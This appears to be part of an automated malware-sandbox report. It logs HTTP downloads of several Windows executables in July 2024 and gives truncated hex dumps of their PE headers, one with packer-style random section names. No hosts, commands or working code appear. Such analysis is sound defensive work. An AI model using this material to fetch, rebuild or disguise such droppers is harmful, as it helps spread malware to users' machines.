e4 5a 08 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 61 b5 07 00 00 10 00 00 00 b6 07 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 94 09 01 00 00 d0 07 00 00 0a 01 00 00 ba 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 1d 00 00 00 e0 08 00 00 04 00 00 00 c4 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 00 09 00 00 02 00 00 00 c8 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 74 6c 73 00 00 00 00 15 00 00 00 00 10 09 00 00 02 00 00 00 ca 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 b0 08 00 00 00 20 09 00 00 0a 00 00 00 cc 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 d8 41 00 00 00 30 09 00 00 42 00 00 00 d6 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Mon, 01 Jul 2024 22:05:35 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "6dde8-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 450024Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d9 93 31 43 9d f2 5f 10 9d f2 5f 10 9d f2 5f 10 29 6e b0 10 9f f2 5f 10 94 8a cc 10 8b f2 5f 10 9d f2 5e 10 22 f2 5f 10 cf 9a 5e 11 9e f2 5f 10 cf 9a 5c 11 95 f2 5f 10 cf 9a 5b 11 d3 f2 5f 10 cf 9a 5a 11 d1 f2 5f 10 cf 9a 5f 11 9c f2 5f 10 cf 9a a0 10 9c f2 5f 10 cf 9a 5d 11 9c f2 5f 10 52 69 63 68 9d f2 5f 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 82 ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 28 06 00 00 82 00 00 00 00 00 00 60 d9 03 00 00 10 00 00 00 40 06 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 f0 06 00 00 04 00 00 2c e0 06 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 10 67 04 00 82 cf 01 00 e8 72 06 00 18 01 00 00 00 a0 06 00 f0 03 00 00 00 00 00 00 00 00 00 00 00 9c 06 00 e8 41 00 00 00 b0 06 00 ac 3d 00 00 60 78 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 77 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 70 06 00 e4 02 00 00 c0 63 04 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 92 26 06 00 00 10 00 00 00 28 06 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 48 29 00 00 00 40 06 00 00 18 00 00 00 2c 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 ac 13 00 00 00 70 06 00 00 14 00 00 00 44 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 69 64 61 74 00 00 34 00 00 00 00 90 06 00 00 02 00 00 00 58 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f0 03 00 00 00 a0 06 00 00 04 00 00 00 5a 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 ac 3d 00 00 00 b0 06 00 00 3e 00 00 00 5e 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Mon, 01 Jul 2024 22:05:36 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "1f3950-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 2046288Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 d0 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 d8 19 00 00 2e 05 00 00 00 00 00 60 a3 14 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 70 1f 00 00 04 00 00 6c 2d 20 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e4 26 1d 00 fa 9d 00 00 de c4 1d 00 40 01 00 00 00 50 1e 00 78 03 00 00 00 00 00 00 00 00 00 00 00 0a 1f 00 50 2f 00 00 00 60 1e 00 5c 08 01 00 b0 01 1d 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 f0 19 00 a0 00 00 00 00 00 00 00 00 00 00 00 7c ca 1d 00 5c 04 00 00 80 26 1d 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 89 d7 19 00 00 10 00 00 00 d8 19 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 6c ef 03 00 00 f0 19 00 00 f0 03 00 00 dc 19 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 52 00 00 00 e0 1d 00 00 2e 00 00 00 cc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 40 1e 00 00 02 00 00 00 fa 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 50 1e 00 00 04 00 00 00 fc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 5c 08 01 00 00 60 1e 00 00 0a 01 00 00 00 1e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Mon, 01 Jul 2024 22:05:38 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "3ef50-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 257872Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 cc 02 00 00 f0 00 00 00 00 00 00 50 cf 02 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 00 04 00 00 04 00 00 53 67 04 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 44 76 03 00 53 01 00 00 97 77 03 00 f0 00 00 00 00 b0 03 00 80 03 00 00 00 00 00 00 00 00 00 00 00 c0 03 00 50 2f 00 00 00 c0 03 00 c8 35 00 00 38 71 03 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 e0 02 00 a0 00 00 00 00 00 00 00 00 00 00 00 14 7b 03 00 8c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 26 cb 02 00 00 10 00 00 00 cc 02 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 d4 ab 00 00 00 e0 02 00 00 ac 00 00 00 d0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 98 0b 00 00 00 90 03 00 00 08 00 00 00 7c 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 a0 03 00 00 02 00 00 00 84 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 80 03 00 00 00 b0 03 00 00 04 00 00 00 86 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 c8 35 00 00 00 c0 03 00 00 36 00 00 00 8a 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Mon, 01 Jul 2024 22:05:38 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "13bf0-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 80880Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 c5 e4 d5 84 a4 8a 86 84 a4 8a 86 84 a4 8a 86 30 38 65 86 86 a4 8a 86 8d dc 19 86 8f a4 8a 86 84 a4 8b 86 ac a4 8a 86 d6 cc 89 87 97 a4 8a 86 d6 cc 8e 87 90 a4 8a 86 d6 cc 8f 87 9f a4 8a 86 d6 cc 8a 87 85 a4 8a 86 d6 cc 75 86 85 a4 8a 86 d6 cc 88 87 85 a4 8a 86 52 69 63 68 84 a4 8a 86 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 7c ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 de 00 00 00 1c 00 00 00 00 00 00 90 d9 00 00 00 10 00 00 00 f0 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 30 01 00 00 04 00 00 d4 6d 01 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e0 e3 00 00 14 09 00 00 b8 00 01 00 8c 00 00 00 00 10 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 fa 00 00 f0 41 00 00 00 20 01 00 10 0a 00 00 80 20 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 20 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 b4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 f4 dc 00 00 00 10 00 00 00 de 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 f4 05 00 00 00 f0 00 00 00 02 00 00 00 e2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 84 05 00 00 00 00 01 00 00 06 00 00 00 e4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 00 04 00 00 00 10 01 00 00 04 00 00 00 ea 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 10 0a 00 00 00 20 01 00 00 0c 00 00 00 ee 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Mon, 01 Jul 2024 22:05:43 GMTContent-Type: application/octet-streamContent-Length: 1874432Last-Modified: Mon, 01 Jul 2024 20:58:38 GMTConnection: keep-aliveETag: "6683187e-1c9a00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 cc 13 50 4a 88 72 3e 19 88 72 3e 19 88 72 3e 19 d3 1a 3d 18 86 72 3e 19 d3 1a 3b 18 28 72 3e 19 5d 1f 3a 18 9a 72 3e 19 5d 1f 3d 18 9e 72 3e 19 5d 1f 3b 18 fd 72 3e 19 d3 1a 3a 18 9c 72 3e 19 d3 1a 3f 18 9b 72 3e 19 88 72 3f 19 5e 72 3e 19 13 1c 37 18 89 72 3e 19 13 1c c1 19 89 72 3e 19 13 1c 3c 18 89 72 3e 19 52 69 63 68 88 72 3e 19 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 84 ea 61 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 18 00 e4 04 00 00 c6 01 00 00 00 00 00 00 50 4a 00 00 10 00 00 00 00 05 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 80 4a 00 00 04 00 00 60 e1 1c 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 58 a0 06 00 6c 00 00 00 00 90 06 00 e0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 7c 3c 4a 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2c 3c 4a 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 80 06 00 00 10 00 00 00 dc 02 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 e0 01 00 00 00 90 06 00 00 02 00 00 00 ec 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 a0 06 00 00 02 00 00 00 ee 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 10 2a 00 00 b0 06 00 00 02 00 00 00 f0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 6a 6b 62 65 75 62 71 76 00 80 19 00 00 c0 30 00 00 80 19 00 00 f2 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 79 62 62 74 67 71 74 7a 00 10 00 00 00 40 4a 00 00 06 00 00 00 72 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 50 4a 00 00 22 00 00 00 78 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Mon, 01 Jul 2024 22:05:53 GMTContent-Type: application/octet-streamContent-Length: 2520576Last-Modified: Mon, 01 Jul 2024 12:19:06 GMTConnection: keep-aliveETag: "66829eba-267600"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 4a 8c 64 5a 0e ed 0a 09 0e ed 0a 09 0e ed 0a 09 61 9b a1 09 16 ed 0a 09 61 9b 94 09 03 ed 0a 09 61 9b a0 09 35 ed 0a 09 07 95 89 09 0d ed 0a 09 07 95 99 09 0c ed 0a 09 8e 94 0b 08 0d ed 0a 09 0e ed 0b 09 5a ed 0a 09 61 9b a5 09 01 ed 0a 09 61 9b 97 09 0f ed 0a 09 52 69 63 68 0e ed 0a 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 89 fa 75 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 ac 01 00 00 e8 21 00 00 00 00 00 24 fc be 00 00 10 00 00 00 c0 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 20 bf 00 00 04 00 00 00 00 00 00 02 00 40 80 00 00 20 00 00 20 00 00 00 00 20 00 00 20 00 00 00 00 00 00 10 00 00 00 20 00 9d 00 f2 0d 00 00 14 0e 9d 00 0c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 9d 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 01 00 00 10 00 00 00 a4 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 80 00 00 00 c0 01 00 00 40 00 00 00 a8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 30 21 00 00 40 02 00 00 04 00 00 00 e8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 50 00 00 00 70 23 00 00 20 00 00 00 ec 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 10 79 00 00 c0 23 00 00 28 03 00 00 0c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 64 61 74 61 00 00 00 00 50 22 00 00 d0 9c 00 00 42 22 00 00 34 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Mon, 01 Jul 2024 22:05:56 GMTServer: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30Last-Modified: Sun, 30 Jun 2024 07:52:30 GMTETag: "81000-61c16c33a5f2a"Accept-Ranges: bytesContent-Length: 528384Content-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 ed bc 81 78 a9 dd ef 2b a9 dd ef 2b a9 dd ef 2b 7a af ec 2a b8 dd ef 2b 7a af ea 2a 00 dd ef 2b 7a af eb 2a bf dd ef 2b 6b 5c eb 2a bb dd ef 2b 6b 5c ec 2a bc dd ef 2b 7a af ee 2a ae dd ef 2b a9 dd ee 2b 28 dd ef 2b 6b 5c ea 2a fc dd ef 2b 5a 5f ea 2a a8 dd ef 2b 5a 5f ef 2a a8 dd ef 2b 5a 5f ed 2a a8 dd ef 2b 52 69 63 68 a9 dd ef 2b 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 b7 0e 81 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 27 00 40 02 00 00 dc 05 00 00 00 00 00 52 74 00 00 00 10 00 00 00 50 02 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 30 08 00 00 04 00 00 00 00 00 00 03 00 40 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 c0 f5 02 00 50 00 00 00 10 f6 02 00 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 08 00 1c 1d 00 00 68 d8 02 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a8 d7 02 00 40 00 00 00 00 00 00 00 00 00 00 00 00 50 02 00 64 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 